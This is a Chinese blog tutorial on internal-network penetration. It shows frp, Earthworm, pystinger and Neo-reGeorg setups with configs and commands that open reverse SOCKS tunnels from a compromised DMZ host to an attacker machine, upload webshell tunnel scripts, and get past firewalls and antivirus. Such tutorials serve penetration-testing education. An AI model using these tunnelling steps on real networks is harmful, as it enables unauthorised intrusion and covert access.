内网渗透-(端口复用和隧道建立)

最新推荐文章于 2025-03-25 16:17:03 发布
最新推荐文章于 2025-03-25 16:17:03 发布
阅读量3.9k 收藏 8
点赞数 1
文章标签: linux 安全 运维 测试工具 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_50643984/article/details/123494026
版权
本文介绍了如何利用frp、Earthworm和Neo-reGeorg等工具进行内网穿透,以及端口复用技术的应用。重点讲解了frp的配置和使用,强调其作为稳定高效的内网穿透工具。同时提到了Earthworm的局限性和速度问题,以及Neo-reGeorg的webshell建立 socks5代理的方法。此外,还探讨了在特定环境下的端口复用策略,如80端口出网的场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:

首先对于出网与不出网的区别很多人不理解,内网不出网到底是ping不通百度还是ping不通同一网段的机器。

其实大部分内网不出网都是ping不通百度,不能去外网,ping不通同一网段要不是配置错误,要不就是防火墙问题,还有就是不能ping通同一网段的机器上线价值不大,以下我们讨论的不出网都是不能ping通百度的。

对于有双网卡的机器,既可以出外网又和内网机器相同我们称这个机器为(DMZ区机器),也就是win7机器,一般也是我们的跳板机。

对于这种我们可以直接拿下dmz区域的机器,利用dmz机器跳板进入内网。

1.frp搭建

首先我们明确知道,win7可以访问内网机器,还可以访问外网,我们就可以通过建立与win7的连接,利用win7的端口去访问内网机器,然后进击内网!

这是frp的配置文件,有win版本也有linux版本,还有mac版本,linux启动方式就是 ./frps -c frps.ini ,类似的系统对应启动方式也差不多,详情可以看官方方法,这里不赘述。下载地址

1.首先kali搭建frps服务端(kali也可以是vps)

frps.ini

[common]
bind_addr=192.168.175.145 #kali的ip也可以是vps的ip
bind_port=7000
allow_ports=1000-2000

2.win7的配置,也就是dmz配置

frpc.ini

[common]
server_addr=192.168.31.120
server_port=7000

[socks5]
type=tcp
plugin=socks5
remote_port=1080

这里是建立socks5的隧道,这个速度非常块。

然后利用proxychains工具和proxifier的全局代理socks5就可以进击内网了。

2.Earthworm(ew)穿透内网

1.kali执行

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

2.win7的dmz执行

./ew_for_win64.exe -s rssocks -d 192.168.175.145 -e 1234

然后利用proxychains工具和proxifier的全局代理socks5就可以进击内网了。

缺点:ew是非常老的工具了,真实环境一上线就会被杀软秒杀,而且速度没有frp快。

二:不出网的隧道和端口复用

首先看以下拓补图

在这里插入图片描述
1.可以建立正向的http隧道

利用cs的上线虚拟机,然后上线不出网的服务器。但是配置复杂而且是正向连接,容易被防火墙拦截,我就不写出了。

2.利用毒刺

毒刺(pystinger)通过Webshell实现内⽹Socks4代理,端⼝映射,可直接⽤于metasploit- framework,cobalt strike上线。主体使⽤python开发,当前⽀持php、jsp(x)、aspx三种代理脚本。

项⽬地址:https://github.com/FunnyWolf/pystinger

首先内网需要有web的环境,而且需要支持php,jsp,aspx的脚本运行,限制也挺大的。

1.⾸先,将对应的脚本⽂件上传到⽬标⽹站⽬录,访问成功返回 UTF-8。

在这里插入图片描述

2.上传stinger_server.exe 到目标服务器,并start命令运行该程序

start stinger_server.exe

3.kali运行客户端(vps也行)

./stinger_client -w http://example.com/proxy.jsp -l 0.0.0.0 -p 60000

然后会在60000端口开启socks隧道,只要配置proxychains就可以了

3.Neo-reGeorg(socks5)

1.设置密码,生成tunnel的webshell,并上传到目标服务器。

python neoreg.py generate -k 自定义密码

2.使用neoreg.py连接webshell,并在本地建立socks代理

python neoreg.py -k 密码 -u http://example.xx/tunnel.*(php/jsp/asp) -p 自定义端口

## 4.端口复用技术
利用场景,就是机器只支持80端口出网而且还不能配置防火墙,巧妙使用可以过防火墙,就是80端口可能流量太多,不稳定。

这里贴个使用连接,传送门

3.总结

frp是目前比较好的内网穿透工具,而且不断跟新,也是跨平台的,支持多种协议,大家一定要牢记frp的使用。

1、Earthworm不能过杀软!被秒杀…

2、Tunnel非常不稳定,web都动不动崩溃,更别说支持3389了…(Neo-reGeorg)

3、ptunnel该环境在内网多限制情况才可利用,局限性,ptunnel是一款建立ICMP隧道传输数据的工具。
适用条件:防火墙只允许ping出站流量,利用ptunnel建立ICMP隧道,从而实现传输数据。)

4、DNS 隧道穿透,适合僵尸网络…太慢了…流量走得太慢,测试我都浪费很多时间…

红队内网攻防渗透内网渗透内网对抗:实战项目&VPC2打靶&父子域三层路由&某绒免杀&下载突破&约束委派&域控提权
HACKONE的博客
02-23 237
但是再上传之前还要考虑shell的正反向问题,有没有防火墙就是关键,我们ping一下2.11,发现ping不通,不用想肯定是开了,那只能反向shell建立连接。将生成的2.jsp文件放进2文件夹,然后右键生成压缩包2.zip,再修改压缩包后缀为war,这样2.war木马包就制作出来了。打开后发现存在SQLserver数据库密码,这样就可以尝试连接2.11的数据库,因为可能密码都是一样的。我们打开目标的火绒发现火绒拦截了我们的shell,因为它开启了防止横向的功能。
内网渗透技术
帅醉了的博客
04-30 2455
内网穿透技术原理netshiptablesregerogEarthwormicmptunneldns2tcpc端口复用 原理 内网穿透技术原理:通过拿到shell的主机,要去访问内网的其他主机时候,通过监听本地端口,靶机转发目标内网主机到本地监听端口上。另一种是访问本地端口(内网主机),通过映射的方式。如下图,kali通过vpn开启的8081去访问win10的3306服务。vpn先是开启监听,通过...
FRP:配置反向代理与内网穿透
we chat:玩转测试开发
03-12 2656
frp 是一个快速反向代理,帮助您将NAT或防火墙后面的本地服务器暴露到internet 的 开源、简洁易用、高性能的内网穿透反向代理软件,支持 tcp, udp, http, https等协议,github Star 高达65.1k。3.2、家庭网络访问公司服务器:xshell等ssh连上外网ip所在的服务器,ssh端口1234。5、多个原生支持的客户端插件(静态文件查看,HTTP、SOCK5 代理等),1、配置服务端:外网ip所在的服务器,假设为:111.112.113.114。
frp端口复用内网穿透ssh与scp的使用
yeamon的博客
01-08 1418
frp端口复用内网穿透ssh与scp的使用
FRP内网穿透
最新发布
m0_69459218的博客
03-25 939
FRP 是一款高性能的反向代理应用,专注于内网穿透。它支持多种协议,包括 TCP、UDP、HTTP、HTTPS 等,并且具备 P2P 通信功能。使用 FRP,您可以安全、便捷地将内网服务暴露到公网,通过拥有公网 IP 的节点进行中转。多种协议支持:客户端服务端通信支持 TCP、QUIC、KCP Websocket 等多种协议。TCP 连接流式复用:在单个连接上承载多个请求,减少连接建立时间,降低请求延迟。代理组间的负载均衡。端口复用:多个服务可以通过同一个服务端端口暴露。
端口复用技术与实现代码
热门推荐
03-04 1万+
在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:  s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);   saddr.sin_family = AF_INET;   saddr.sin_addr.s_addr = htonl(INADDR_ANY);   bind(s,(SOCKADDR *)&saddr,sizeof(
端口复用技术
weixin_33694172的博客
03-12 508
二)防火墙渗透 以上我们简单的介绍了防火墙的原理,分类,优缺点等。下面,我们将对防火墙的渗透技术做一下简单的介绍。 精心配置过的防火墙固然将让绝大多数crackers挡在外围,掌握网络控制的主动权,但是,防火墙并不是万能的,我们也在上一节的内容中简单的讲了防火墙的缺点。没有任何一样网络产品可以说是绝对安全的。绿盟的san的一篇的文章介绍了渗透防火墙的shellcode,有兴趣的朋友可以参考一下:h...
漏洞反连检测组合拳:内网穿透与多协议复用端口
YakProject的博客
11-07 270
于是,我们在 yak 中实现了一套机制,叫 cybertunnel, 使用 grpc 构建了一套端口穿透的技术,我们可以实现映射一个本地 tcp / udp 协议端口到远端。我们可以使用 yak tunnel 映射本地任何端口出去,包括 yak grpc,因此我们在内网进行渗透的时候,只要运行一个 yak grpc,再通过 yak tunnel 穿透出去,就可以使用 yakit 连接了!代码其实非常简单,我们在任何需要检测漏洞的时候,如果需要获取反连 URL,特别是公网可以访问的 URL。
内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL
weixin_39539807的博客
05-13 535
WinRM(Windows Remote Management)是Windows远程管理的简称,WinRM基于Web服务管理(WS-Management)标准,使用80443端口,可以在对方开启防火墙的情况下远程管理目标机。在Windows Server 2008 R2以上的系统中都默认开启该服务。如果防御者配置不当,攻击者在内网渗透中很可能会利用WinRM实现端口复用,进而实现内网无文件攻击反...
关于苛刻网络做Linux端口复用的那件事
include_voidmain的博客
04-14 1174
0x01 前言 端口复用是指不同的应用程序使用相同端口进行通讯。内网渗透中,搭建隧道时,服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。 0x02 Linux端口复用 一、iptables实现端口复用 iptables只是Linux防火墙的管理工具而已。真正实现防火墙功能的是netfilter, 它是Linux内核中实现包过滤的内部结构。 二、数据通过防火墙流程 1、 链 链是一些按顺序排列的规则的列表。 PREROUTING链——对数据包作路由选择
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7839
代理面试常问一.概述代理的本质是socks协议
一文打尽 Linux/Windows端口复用实战
Ms08067安全实验室
12-04 1017
本文作者:Spark(Ms08067内网安全小组成员)Spark微信(欢迎骚扰交流): 定义:端口复用是指不同的应用程序使用相同端口进行通讯。场景:内网渗透中,搭建隧道时,服...
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
安全之路 —— 利用端口复用技术隐藏后门端口
雨者
06-01 1729
简介 前面我们介绍到我们可以用进程注入的方法,借用其他应用的端口收发信息,从而达到穿墙的效果,那么今天介绍一种新的方法,叫做端口复用技术,他能够与其他应用绑定同一个端口,但同时进行端口复用的程序会接管之前程序的信息接受权,所以我们在复用端口后,要对非后门信息通过127.0.0.1本机回环地址进行消息转发。 C++代码样例 ///////////////////////////////...
渗透测试常见端口总结
2301_79977730的博客
04-09 1884
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口的攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程中,网络上传输的用户密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
聊聊端口复用的实现坑点
全粘工程师
01-08 906
这里有一个 ClientThread() 函数,这个函数是需要在 main() 函数里面调用的(见如上代码),这里创建一个套接字来连接本地的 3389 端口,用 while 循环来处理复用交互的数据, 80 端口监听到的数据发送到本地的 3389 端口上面去,从本地的 3389 端口读取到的数据用 80 端口的套接字发送出去,这就构成了端口复用的重定向,当然在这个地方可以像上面python代码一样,在中间加一个数据判断条件,从而保证数据流向的完整可靠精准性。哦,不,是千斤顶,换备胎的时候用一下。
网安实验4-2. 端口复用测试实验
I feel lost
04-10 1143
实验内容】     1.阅读p143-144,理解端口复用技术。 实验环境: 主机A为客户端,操作系统为win7,IP地址为172.16.15.1 主机B为服务端,操作系统为win7,IP地址为172.16.0.15 实验结果: (1)客户端木马程序发送信息给服务端: 服务器上的控制台,识别到木马程序,回传信息给客户端:   客户端上的控制台:   (2)客户端非木马
python利用setsockopt获得端口重用
github_40094105的博客
09-24 1万+
原作者 假如端口被socket使用过,并且利用socket.close()来关闭连接,但此时端口还没有释放,要经过一个TIME_WAIT的过程之后才能使用,这是TNN的相当烦银的,为了实现端口的马上复用,可以选择setsockopt()函数来达到目的。(以下是网上找到的一篇文章的一小段相关例子,试用之后,相当有效果,特此提取出来收藏)端口复用的实现,我在这里用Python举个TCP端口复用的例子,U
端口复用重映射
qq_67574564的博客
03-27 807
一、端口复用 1.复用端口初始化 1) GPIO 端口时钟使能。要使用到端口复用,当然要使能端口的时钟了。 RCC_APB2PeriphClockCmd(RCC_APB2Periph_GPIOA, ENABLE); 2) 复用的外设时钟使能。比如你要将端口 PA9,PA10 复用为串口,所以要使能串口时钟。 RCC_APB2PeriphClockCmd(RCC_APB2Periph_USART1, ENABLE); 3) 端口模式配置。 在 IO 复用位内置外设功能引脚的时候,必须设置 GPIO 端口的
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙其他网络安全设备的检测过滤。 ICMP隧道的实现需要两个端点:一个客户端一个服务器端。客户端将要传输的数据封装在ICMP数据包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值